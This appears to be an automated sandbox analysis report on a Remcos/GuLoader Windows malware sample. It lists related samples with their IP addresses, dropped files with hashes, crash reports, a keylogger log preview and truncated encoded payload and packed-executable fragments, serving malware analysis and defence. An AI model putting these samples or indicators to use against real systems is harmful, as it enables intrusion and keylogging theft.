                  GIGANET-HUGigaNetInternetServiceProviderCoHU | Qoute_EXW_prices_43GJI_pdf.exe | malicious | Remcos, GuLoader | 45.95.169.110
                  GIGANET-HUGigaNetInternetServiceProviderCoHU | RFQ-7H87-F8R-pdf.exe | malicious | Remcos, GuLoader | 45.95.169.139
                  GIGANET-HUGigaNetInternetServiceProviderCoHU | Q-5687-348t.exe | malicious | Remcos | 45.95.169.135
                  GIGANET-HUGigaNetInternetServiceProviderCoHU | BdrPfb3rZS.elf | malicious | Gafgyt, Mirai | 45.95.169.149
                  GIGANET-HUGigaNetInternetServiceProviderCoHU | otpD06ykDv.elf | malicious | Gafgyt, Mirai | 45.95.169.149
                  GIGANET-HUGigaNetInternetServiceProviderCoHU | wzPLWj0B5C.elf | malicious | Gafgyt | 45.95.169.146
                  GIGANET-HUGigaNetInternetServiceProviderCoHU | NxFjydLnaS.elf | malicious | Gafgyt | 45.95.169.146
                  No context
                  No context
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9084555098033209
                  Encrypted:false
                  SSDEEP:192:hCT1Js8A0YrZkhaJjkZriHzzuiFeZ24IO8KRA:ABJs8bYrZkhaJjNzuiFeY4IO8KRA
                  MD5:9A9499B08C58249EC40A0C574AD65014
                  SHA1:4D1E3B3B51DC3EE698768A8885BE7896F11A5FF8
                  SHA-256:8D46733E9BA16B3E7456404896C2B192B7D8CC4945DA71AD1F4DAC0CD82D7AD1
                  SHA-512:AB0F1BA3AAD43F92E03FA4E0CEEDF076A4431A7A07D1F584834F1076A798417D179F582C96241AD7CF94D3B749C942A062930D4318930C102AE06BDD68EE0D39
                  Malicious:false
                  Reputation:low
                  Preview (UTF-16 decoded):
                  Version=1
                  EventType=APPCRASH
                  EventTime=133701262190760326
                  ReportType=2
                  Consent=1
                  UploadTime=133701262195447812
                  ReportStatus=524384
                  ReportIdentifier=3462b859-46f3-46d3-976d-c605528b01ec
                  IntegratorReportIdentifier=57757c44-b64f-4724-b166-a7bb18676d3f
                  Wow64Host=34404
                  Wow64Guest=332
                  NsAppName=svchost.exe
                  OriginalFilename=svchost.exe
                  AppSessionGuid=00000e80-0001-0014-e943-b4ed9600db01
                  TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!00003196f45b269a614a3926efc032fc9d75017f27e
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9363468098655506
                  Encrypted:false
                  SSDEEP:192:qWT1JFL8M0qG2GFjjkZriH4zuiFeZ24IO8KRA:rBJFL8HqGPFjjGzuiFeY4IO8KRA
                  MD5:CE1BE38E08A03142200168DA967A37C7
                  SHA1:BB72B5B02DB7C6534EAF7AC7E3C65233AB7A4FDD
                  SHA-256:952DD915722585B06AC30B64EF8200CF7F2F714AA897C9D6BA2B3D8EC968BB57
                  SHA-512:40ABD219564502A4C987E682201584EB79FA8F7AB6E916BFAD13708C10BE709455758D62C1BAF1438DA323FD0374155A72A3AFB1FBD5B48011CC80EC2923253C
                  Malicious:false
                  Reputation:low
                  Preview (UTF-16 decoded):
                  Version=1
                  EventType=APPCRASH
                  EventTime=133701262418961359
                  ReportType=2
                  Consent=1
                  UploadTime=133701262423961317
                  ReportStatus=524384
                  ReportIdentifier=ba63b463-c4dd-42e3-a65c-d22e9f103333
                  IntegratorReportIdentifier=218695bf-43bc-43db-9cdf-269c68b18ab6
                  Wow64Host=34404
                  Wow64Guest=332
                  NsAppName=svchost.exe
                  OriginalFilename=svchost.exe
                  AppSessionGuid=00000e80-0001-0014-e943-b4ed9600db01
                  TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!00003196f45b269a614a3926efc032fc9d75017f27e
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Fri Sep 6 19:56:59 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):85234
                  Entropy (8bit):1.7825057835408542
                  Encrypted:false
                  SSDEEP:384:Jy98g9USjG5jnkiJ6E6N9kQ7ZHbpShKkyvI2N:Jy9NuGG5jnL6ECkQlpS6wy
                  MD5:6CAA514D6F59A04A51FE30F262AD223A
                  SHA1:1F254BA3B1F4F347D885068C5BBAB7E27A7104F2
                  SHA-256:B7DDF4287F453B6DC3BFCBBC3A596A3A70B78A948484F367F0FA28284625AD8D
                  SHA-512:CA62C4B03D4BCE882458CD7A81CCFC8E19BAD99A9B353202C91AE5168197A2F1B98CFD8F403E613FC9D1BF87AC68AE6E3FF22DC295458B51563EBAA3CD94A9F6
                  Malicious:false
                  Reputation:low
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8272
                  Entropy (8bit):3.691727776888771
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJwxl6d6Yl36AIyXgmfp7JuZ+2prt89bOgsfwam:R6lXJU6d6YV6AIyXgmfp7JuZ+pOzfM
                  MD5:ED0F4771C5B986786FAB93EE755DE9E0
                  SHA1:989ED459F093DD94DF83794A1968AE586E702E9F
                  SHA-256:D209FFA07072B57BBEABAAF5AD8ED948A63BC55D12C424E26C74BE63300C129E
                  SHA-512:ADC9DA2B7D57A3F5BF882DC7821DA7D0DA522E4A9858AB68285BCCDFECE298CC3591B1FCEFD70CDBF6848EAE630AEAB892A2E268B6F48472E3F2E9BCA20169EE
                  Malicious:false
                  Reputation:low
                  Preview (UTF-16 decoded):
                  <?xml version="1.0" encoding="UTF-16"?>
                  <WERReportMetadata>
                    <OSVersionInformation>
                      <WindowsNTVersion>10.0</WindowsNTVersion>
                      <Build>19045</Build>
                      <Product>(0x30): Windows 10 Pro</Product>
                      <Edition>Professional</Edition>
                      <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
                      <Revision>2006</Revision>
                      <Flavor>Multiprocessor Free</Flavor>
                      <Architecture>X64</Architecture>
                      <LCID>2057</LCID>
                    </OSVersionInformation>
                    <ProcessInformation>
                      <Pid>3712</Pi
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4655
                  Entropy (8bit):4.45001390218119
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zswJg77aI9a1WpW8VYTvYm8M4JCxIFoZ+q8ST8D0md:uIjf2I70E7VLJC5Z/8D0md
                  MD5:133C0C7B79A92EB692A12FA6061B4129
                  SHA1:80B4D0EAFCB4A62E58AD40BC1E89FA09E8F9C52F
                  SHA-256:510A075326DA93001F7892BDE68EA14FBCD361F2F5E0C7417515E2E2C5844EC4
                  SHA-512:7538923EA3E09A7FCEA7920A9B0F977333BAFDA79EF964E45737317FAE3E0FBBFC4701114C17F143A37AE4186775193F1C0F84FD2EBE301375F5A31F505E11B1
                  Malicious:false
                  Reputation:low
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="488819" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Fri Sep 6 19:57:22 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):140908
                  Entropy (8bit):1.7781722702700224
                  Encrypted:false
                  SSDEEP:768:eRrUBgG5trDWl06ECkQoNpho189O+lF4rho75HxqA/+2K:krapr5v9o189O+X4rho75HxqA/+2K
                  MD5:A9214519048212A3B607FF09DCEFCF44
                  SHA1:92C8D25C8E0BBBDC84C013BC3F13EAE2094F405D
                  SHA-256:C56ECC7072B919E252F9793C015C902C732638C8933189AAB055315934128913
                  SHA-512:9B90E64EFB5F4E7DD871A7C53FCEA8F892A33D6BC6B7490365D01F3391EDE60A010BE46DB95D4FBAE8AE537FBDBAD64407AA43E1638FD3EFA981C2D26A0FDDB0
                  Malicious:false
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8280
                  Entropy (8bit):3.686134361783112
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJwCA6Hizo46Yl+6AIyXgmfp79AWpDa89brgsf3Zm:R6lXJC6Y6YM6AIyXgmfp79Hrzfk
                  MD5:C200811CB02528FA2B3324A79DD63E1C
                  SHA1:A624E6D0D65D6059DF60E10307AFCDE169BEEE99
                  SHA-256:EE5A86E12BF0A146BF17F7E950CF2F4709A0C19355E898A313157B783415BCCD
                  SHA-512:197616F701A07DF2742784F5AF38E1BE289FC6F13FEAB529A6C1911AE9345EC39FF335AECD86F86F59963494DA49C12B988E9D28729E6A326E5D50B426070068
                  Malicious:false
                  Preview (UTF-16 decoded):
                  <?xml version="1.0" encoding="UTF-16"?>
                  <WERReportMetadata>
                    <OSVersionInformation>
                      <WindowsNTVersion>10.0</WindowsNTVersion>
                      <Build>19045</Build>
                      <Product>(0x30): Windows 10 Pro</Product>
                      <Edition>Professional</Edition>
                      <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
                      <Revision>2006</Revision>
                      <Flavor>Multiprocessor Free</Flavor>
                      <Architecture>X64</Architecture>
                      <LCID>2057</LCID>
                    </OSVersionInformation>
                    <ProcessInformation>
                      <Pid>3712</Pi
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4655
                  Entropy (8bit):4.448573265436057
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsgJg77aI9a1WpW8VYEYm8M4JCxKFz+q8oT8D0md:uIjfmI70E7V4JCqR8D0md
                  MD5:C6176340C1DE8B66707006EFCF8F4595
                  SHA1:3858600F6F26252CF08F05E819BE08E5BC1C3F57
                  SHA-256:E062CE157B4DD320BF56F9F8B1DADB9D8AA09C6C14F1F45E2D57BE8732338C6A
                  SHA-512:9632ACF54EFDDBE9152321470670E001A85CC7711F6BDA7C8354AF95F02BD0044B40FD3E24B0933DA2F51047E2BB3DF11D3C58D9175EA43D05B4A5AC948DDAFF
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="488820" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\svchost.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):184
                  Entropy (8bit):3.3928118725288807
                  Encrypted:false
                  SSDEEP:3:rhlKlTlTGlwfKlxPU5JWRal2Jl+7R0DAlBG4phlKlTlTGlwfKlxPPQblovDl6v:6lclPI5YcIeeDAlMlclPsbWAv
                  MD5:5AD886C53E3181D42C8C37FD02A617AB
                  SHA1:63286DC48329438E388B1549C46D939E694490A4
                  SHA-256:D7263F51A64B921097FFFB259CC0BA73E485876CF630CFA9803A61E5AC344DBF
                  SHA-512:617EBD7A0F84A1C6671ACABE03B45EF50DD1E08822966833675A0F2F84780041C29DA53B71774141513CF88BAB0379D45E69AE006A0EAAECB50B9F7090F6E2E6
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                  Preview (UTF-16 decoded):
                  [2024/09/06 15:56:57 Offline Keylogger Started]
                  [2024/09/06 15:56:57 Program Manager]
                  Process:C:\Users\user\Desktop\jv4ri.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):494592
                  Entropy (8bit):7.648069693388643
                  Encrypted:false
                  SSDEEP:12288:EKeJlfV8SdLU0tuS5k2soir71v1yh9+1FjRVQdOXJjEDl:Ehd8SdLUsu8Fir7Xyh9+xCdOWx
                  MD5:D27901A98FCF9BA932E53C7450496F09
                  SHA1:423DB92CD7D8EF22A1F486A4547BD3B473ECC4A1
                  SHA-256:986EFA4E9A46AB0D0091CD50C8CF22101FE87C21729CE6D90B9441A6448E7071
                  SHA-512:A811201954A1F9998717621FE1F9305E1F2DE2FD2D1B96BEE1660E2235C4B5A63B9CFD10F52FD39810373FFC365281E3BE3316321A1C626064B2B1481936FE8D
                  Malicious:false
                  Process:C:\Users\user\Desktop\jv4ri.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):435094
                  Entropy (8bit):7.988688030415207
                  Encrypted:false
                  SSDEEP:6144:AB8QymyCNA026bs/OG+skFxZObHmJwlx8edLelM0gDskRO79BDUk15J0nfIxag:c8jXXms/O7FrOykbLf0gDXc79BokWwL
                  MD5:3B359F0E0BB258EC851BDF1D17A9F448
                  SHA1:9F1D46562F12D11C70DFC7215A4862E5A7D6B876
                  SHA-256:4552D49989780CC2EBBF5CC50454ECE310078ECE1B67A2D9A496DB3F4C00E585
                  SHA-512:DD2153A6961846F237CA2234410D98936728864F1E3508D77E8546B990F97BBE50E0A182FF2E9C7ABC5BA9DB6BFD08D6A5F574F41BF4C7E95A7BA0D0B2FFD79A
                  Malicious:false
                  Process:C:\Users\user\Desktop\jv4ri.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16506
                  Entropy (8bit):7.575140850617736
                  Encrypted:false
                  SSDEEP:384:T0fPw2X19Oc+FtDTRuqsvHUddjObP7P9kJ0UXPT3kdxzsAvRZp:TSwy/MFBBsv6djObPBkOiPCxQGV
                  MD5:64C0A461DAEA97226D05D1A92A219D77
                  SHA1:42E64F7F89BB396A969F35FE8E8446E184D9E97A
                  SHA-256:A797284C52DC19C38B2A640294F221C0225FEF47FD194DACE17A966055615054
                  SHA-512:6297133A731F0AD60CDF1F2E74B40FA2A51A8D987096B924023627AD7A6268B34352E827BD99952FBDA1932A25E3E882106704F52DF7481EFBD192ABAFCC9910
                  Malicious:false
                  Process:C:\Users\user\AppData\Local\directory\name.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):435094
                  Entropy (8bit):7.988688030415207
                  Encrypted:false
                  SSDEEP:6144:AB8QymyCNA026bs/OG+skFxZObHmJwlx8edLelM0gDskRO79BDUk15J0nfIxag:c8jXXms/O7FrOykbLf0gDXc79BokWwL
                  MD5:3B359F0E0BB258EC851BDF1D17A9F448
                  SHA1:9F1D46562F12D11C70DFC7215A4862E5A7D6B876
                  SHA-256:4552D49989780CC2EBBF5CC50454ECE310078ECE1B67A2D9A496DB3F4C00E585
                  SHA-512:DD2153A6961846F237CA2234410D98936728864F1E3508D77E8546B990F97BBE50E0A182FF2E9C7ABC5BA9DB6BFD08D6A5F574F41BF4C7E95A7BA0D0B2FFD79A
                  Malicious:false
                  Process:C:\Users\user\AppData\Local\directory\name.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16506
                  Entropy (8bit):7.575140850617736
                  Encrypted:false
                  SSDEEP:384:T0fPw2X19Oc+FtDTRuqsvHUddjObP7P9kJ0UXPT3kdxzsAvRZp:TSwy/MFBBsv6djObPBkOiPCxQGV
                  MD5:64C0A461DAEA97226D05D1A92A219D77
                  SHA1:42E64F7F89BB396A969F35FE8E8446E184D9E97A
                  SHA-256:A797284C52DC19C38B2A640294F221C0225FEF47FD194DACE17A966055615054
                  SHA-512:6297133A731F0AD60CDF1F2E74B40FA2A51A8D987096B924023627AD7A6268B34352E827BD99952FBDA1932A25E3E882106704F52DF7481EFBD192ABAFCC9910
                  Malicious:false
                  Preview:EA06...".L&.J..q4..........O.8....'VP..X..>I..'....?nd.%......;...|.p...p.[.X..?.....l....1.r.....'.4...' ..h...od.).. +.$....6.....<.....Q.....0.o.l.Q......P.o.f...................<.,.......f@e_........~.@.o.Fl...X.y.....g..9.....[....Ic.....?.y....4...,..?.H<...U......@.o..c......g...l..c...8..@.>...G.H.....D}.0(...d.q...l|.P(...h........Q...........l`Q..D......... J_......-......@./.p.E.....6@./.;..[..9}.....1......._hw...d...C.... eG.......`....n..!..}..vP&.;............."l....X@...C?.a....&... OW..6.J....?.K(Q..[0....&._. 4W.9....&._.$.%#.H...f._.hK......M.`..)..W.m4....E...9..W.Z#...M..?../.py....~.0..."."..M.3.......".......6.....n.....y.i..7.."...+...<.u.........60...h......@<.-.E3.u...}..Q..D........"z...f.a........=G..b'...lD.......c'...&`<..E......J..62z.....R......@.o.D...m...}.y..%....6..a..p...'.....?....o.c!...b=.h...3.....e?{0.'.........60...nb....@..I.B..d%...c?.Y.FW.f.Z..@c?y....e....fA..h...f...l.._m..3.6#..g.1........2O......%'.4.8...)?y...
                  Process:C:\Users\user\AppData\Local\directory\name.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):435094
                  Entropy (8bit):7.988688030415207
                  Encrypted:false
                  SSDEEP:6144:AB8QymyCNA026bs/OG+skFxZObHmJwlx8edLelM0gDskRO79BDUk15J0nfIxag:c8jXXms/O7FrOykbLf0gDXc79BokWwL
                  MD5:3B359F0E0BB258EC851BDF1D17A9F448
                  SHA1:9F1D46562F12D11C70DFC7215A4862E5A7D6B876
                  SHA-256:4552D49989780CC2EBBF5CC50454ECE310078ECE1B67A2D9A496DB3F4C00E585
                  SHA-512:DD2153A6961846F237CA2234410D98936728864F1E3508D77E8546B990F97BBE50E0A182FF2E9C7ABC5BA9DB6BFD08D6A5F574F41BF4C7E95A7BA0D0B2FFD79A
                  Malicious:false
                  Preview:EA06........ZM.iM..j.~O..L..h3..&.Q.S..y.(.d....i.*.I.....g..4.sD.....l..w..`X...E+..i3y..X..%U.}^.=.L....j....T..[.K.6y.2g..K..c...dy9L>Y.A*~y..an.B.Y../go.v........*..|..d...~.O.$.B%.>.'.......R....z6...H+.)..O....y..W...*X......Fj.JV..l.....7.>.K3..F[-.......%q..a5j.......u...f....9...i} ...@...x...Q...-^.&.K)s...mH.K.SZX..,...*....Fq......e..5...V@W....h.).....Nr.0.............>.E...S.l.S.ut...y.`....8.I.:.......zd..d.Q.ed.d.S*......j.Rj6.]JQ".N).t.B.R'4Yh.i<............up.B.l..j5....d.Q..~......$S`.Fz.2..3.U8.d....~........Y..my.E).Y..F.Kj......w..&4ip.Y.......sz..'......L..m....s2.S......J..m`.$j............G.*.\&.)..9....9.C~.Pl._..9..kq.Tes.F.U...u&...~47.u[s...+.i....X(.k.&M...a.ZL?....h..C..g..M..A.S.~*yQ.....\.....2<P.LY.........24P.L\o.......21..LRq......C..Z..k..io.*...... .j.F...j....k......R[6.l.P.]...=y..o..f.....?..ZM...9.l%1I....R..........TZe&.B...;..:.E.}..,o........U2C...&..-.wN.}+...;~....9.*Ig..'=..8...X..i.
                  Process:C:\Users\user\AppData\Local\directory\name.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16506
                  Entropy (8bit):7.575140850617736
                  Encrypted:false
                  SSDEEP:384:T0fPw2X19Oc+FtDTRuqsvHUddjObP7P9kJ0UXPT3kdxzsAvRZp:TSwy/MFBBsv6djObPBkOiPCxQGV
                  MD5:64C0A461DAEA97226D05D1A92A219D77
                  SHA1:42E64F7F89BB396A969F35FE8E8446E184D9E97A
                  SHA-256:A797284C52DC19C38B2A640294F221C0225FEF47FD194DACE17A966055615054
                  SHA-512:6297133A731F0AD60CDF1F2E74B40FA2A51A8D987096B924023627AD7A6268B34352E827BD99952FBDA1932A25E3E882106704F52DF7481EFBD192ABAFCC9910
                  Malicious:false
                  Preview:EA06...".L&.J..q4..........O.8....'VP..X..>I..'....?nd.%......;...|.p...p.[.X..?.....l....1.r.....'.4...' ..h...od.).. +.$....6.....<.....Q.....0.o.l.Q......P.o.f...................<.,.......f@e_........~.@.o.Fl...X.y.....g..9.....[....Ic.....?.y....4...,..?.H<...U......@.o..c......g...l..c...8..@.>...G.H.....D}.0(...d.q...l|.P(...h........Q...........l`Q..D......... J_......-......@./.p.E.....6@./.;..[..9}.....1......._hw...d...C.... eG.......`....n..!..}..vP&.;............."l....X@...C?.a....&... OW..6.J....?.K(Q..[0....&._. 4W.9....&._.$.%#.H...f._.hK......M.`..)..W.m4....E...9..W.Z#...M..?../.py....~.0..."."..M.3.......".......6.....n.....y.i..7.."...+...<.u.........60...h......@<.-.E3.u...}..Q..D........"z...f.a........=G..b'...lD.......c'...&`<..E......J..62z.....R......@.o.D...m...}.y..%....6..a..p...'.....?....o.c!...b=.h...3.....e?{0.'.........60...nb....@..I.B..d%...c?.Y.FW.f.Z..@c?y....e....fA..h...f...l.._m..3.6#..g.1........2O......%'.4.8...)?y...
                  Process:C:\Users\user\AppData\Local\directory\name.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):435094
                  Entropy (8bit):7.988688030415207
                  Encrypted:false
                  SSDEEP:6144:AB8QymyCNA026bs/OG+skFxZObHmJwlx8edLelM0gDskRO79BDUk15J0nfIxag:c8jXXms/O7FrOykbLf0gDXc79BokWwL
                  MD5:3B359F0E0BB258EC851BDF1D17A9F448
                  SHA1:9F1D46562F12D11C70DFC7215A4862E5A7D6B876
                  SHA-256:4552D49989780CC2EBBF5CC50454ECE310078ECE1B67A2D9A496DB3F4C00E585
                  SHA-512:DD2153A6961846F237CA2234410D98936728864F1E3508D77E8546B990F97BBE50E0A182FF2E9C7ABC5BA9DB6BFD08D6A5F574F41BF4C7E95A7BA0D0B2FFD79A
                  Malicious:false
                  Preview:EA06........ZM.iM..j.~O..L..h3..&.Q.S..y.(.d....i.*.I.....g..4.sD.....l..w..`X...E+..i3y..X..%U.}^.=.L....j....T..[.K.6y.2g..K..c...dy9L>Y.A*~y..an.B.Y../go.v........*..|..d...~.O.$.B%.>.'.......R....z6...H+.)..O....y..W...*X......Fj.JV..l.....7.>.K3..F[-.......%q..a5j.......u...f....9...i} ...@...x...Q...-^.&.K)s...mH.K.SZX..,...*....Fq......e..5...V@W....h.).....Nr.0.............>.E...S.l.S.ut...y.`....8.I.:.......zd..d.Q.ed.d.S*......j.Rj6.]JQ".N).t.B.R'4Yh.i<............up.B.l..j5....d.Q..~......$S`.Fz.2..3.U8.d....~........Y..my.E).Y..F.Kj......w..&4ip.Y.......sz..'......L..m....s2.S......J..m`.$j............G.*.\&.)..9....9.C~.Pl._..9..kq.Tes.F.U...u&...~47.u[s...+.i....X(.k.&M...a.ZL?....h..C..g..M..A.S.~*yQ.....\.....2<P.LY.........24P.L\o.......21..LRq......C..Z..k..io.*...... .j.F...j....k......R[6.l.P.]...=y..o..f.....?..ZM...9.l%1I....R..........TZe&.B...;..:.E.}..,o........U2C...&..-.wN.}+...;~....9.*Ig..'=..8...X..i.
                  Process:C:\Users\user\AppData\Local\directory\name.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16506
                  Entropy (8bit):7.575140850617736
                  Encrypted:false
                  SSDEEP:384:T0fPw2X19Oc+FtDTRuqsvHUddjObP7P9kJ0UXPT3kdxzsAvRZp:TSwy/MFBBsv6djObPBkOiPCxQGV
                  MD5:64C0A461DAEA97226D05D1A92A219D77
                  SHA1:42E64F7F89BB396A969F35FE8E8446E184D9E97A
                  SHA-256:A797284C52DC19C38B2A640294F221C0225FEF47FD194DACE17A966055615054
                  SHA-512:6297133A731F0AD60CDF1F2E74B40FA2A51A8D987096B924023627AD7A6268B34352E827BD99952FBDA1932A25E3E882106704F52DF7481EFBD192ABAFCC9910
                  Malicious:false
                  Preview:EA06...".L&.J..q4..........O.8....'VP..X..>I..'....?nd.%......;...|.p...p.[.X..?.....l....1.r.....'.4...' ..h...od.).. +.$....6.....<.....Q.....0.o.l.Q......P.o.f...................<.,.......f@e_........~.@.o.Fl...X.y.....g..9.....[....Ic.....?.y....4...,..?.H<...U......@.o..c......g...l..c...8..@.>...G.H.....D}.0(...d.q...l|.P(...h........Q...........l`Q..D......... J_......-......@./.p.E.....6@./.;..[..9}.....1......._hw...d...C.... eG.......`....n..!..}..vP&.;............."l....X@...C?.a....&... OW..6.J....?.K(Q..[0....&._. 4W.9....&._.$.%#.H...f._.hK......M.`..)..W.m4....E...9..W.Z#...M..?../.py....~.0..."."..M.3.......".......6.....n.....y.i..7.."...+...<.u.........60...h......@<.-.E3.u...}..Q..D........"z...f.a........=G..b'...lD.......c'...&`<..E......J..62z.....R......@.o.D...m...}.y..%....6..a..p...'.....?....o.c!...b=.h...3.....e?{0.'.........60...nb....@..I.B..d%...c?.Y.FW.f.Z..@c?y....e....fA..h...f...l.._m..3.6#..g.1........2O......%'.4.8...)?y...
                  Process:C:\Users\user\Desktop\jv4ri.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:dropped
                  Size (bytes):258082
                  Entropy (8bit):2.7962903456826793
                  Encrypted:false
                  SSDEEP:192:L9tu9P9lt9yJ969wa9dY9109cV9csqm0CpY+XzEa69FIoQKM5CfdeQVL3xAnonwU:6
                  MD5:853BE9124B51E48F5D850A835321CE11
                  SHA1:27873A837151FB53B7656C34A565745B84E38342
                  SHA-256:BB2A93BD61D6F95E4C9F0D4129D38633270DF2128C57B97F5406655861030D0B
                  SHA-512:192D1B16B630BA3237F19F5BAD187304B035C2C5C07AF9DB05C7F4DF763121D8B682A732D8728068DD92BD3D6BEF2ED98C8C3EFFFD0CFC87126894108E1B23FD
                  Malicious:false
                  Preview:6044B18406044B184x6044B18456044B18456044B18486044B184b6044B184e6044B184c6044B18486044B18416044B184e6044B184c6044B184c6044B184c6044B18406044B18426044B18406044B18406044B18406044B18406044B18456044B18466044B18456044B18476044B184b6044B18486044B18466044B184b6044B18406044B18406044B18406044B18406044B18406044B18406044B18466044B18466044B18486044B18496044B18446044B18456044B18486044B18446044B184b6044B18496044B18466044B18456044B18406044B18406044B18406044B18406044B18406044B18406044B18466044B18466044B18486044B18496044B18446044B184d6044B18486044B18466044B184b6044B184a6044B18476044B18426044B18406044B18406044B18406044B18406044B18406044B18406044B18466044B18466044B18486044B18496044B18456044B18456044B18486044B18486044B184b6044B18486044B18466044B184e6044B18406044B18406044B18406044B18406044B18406044B18406044B18466044B18466044B18486044B18496044B18446044B18456044B18486044B184a6044B184b6044B18496044B18466044B18456044B18406044B18406044B18406044B18406044B18406044B18406044B18466044B18466044B18486044B18496044B18446
                  Process:C:\Users\user\Desktop\jv4ri.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                  Category:dropped
                  Size (bytes):826368
                  Entropy (8bit):7.981854223673753
                  Encrypted:false
                  SSDEEP:24576:4BXu9HGaVHUVeaBzcvMgTvk+39ABn8ApTZl:4w9VHUVebvjT19ABfp
                  MD5:B17E1003BB9BBE58E090C7752447C016
                  SHA1:A159B486E535469D4C49B227D27608F2AD48288E
                  SHA-256:D24D76D03365122AA5A4A7828A2D14368066DA840AE8945CF595A6B17CECA700
                  SHA-512:05077E35558E1BB636596D7A8C6B66F9554ECF8E057F61C3CF7F4AF91C19F898943A5DC8B1F13914B231E09671A36631E2490E0B32799250537A375DAD83AF3A
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 42%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L....B.f.........."......p...@...P.......`........@.......................................@...@.......@.....................P...$.......P/..................t...........................................H...........................................UPX0.....P..............................UPX1.....p...`...d..................@....rsrc....@.......4...h..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
                  Process:C:\Users\user\AppData\Local\directory\name.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):270
                  Entropy (8bit):3.4297698362729916
                  Encrypted:false
                  SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlzQ1A1z4mA2n
                  MD5:3DA73F5D6073C0D8F7B9CEE8DF5035A7
                  SHA1:D4B44315FD7C6171A9CC03899A00E593AE78CDE7
                  SHA-256:1F2D7E91D96B7DA16BC230D9C519E5E0A6A78FCD6B3468E590D5A97239BB420B
                  SHA-512:CE2041AA9AAFE863C44296E4ED58BA207E4849584AB057B93354F10679DC1BFAE50241EEDAD74DCC4D7AF6C8ADC3A97E4581F56E5E71955651D52BA866ED763B
                  Malicious:true
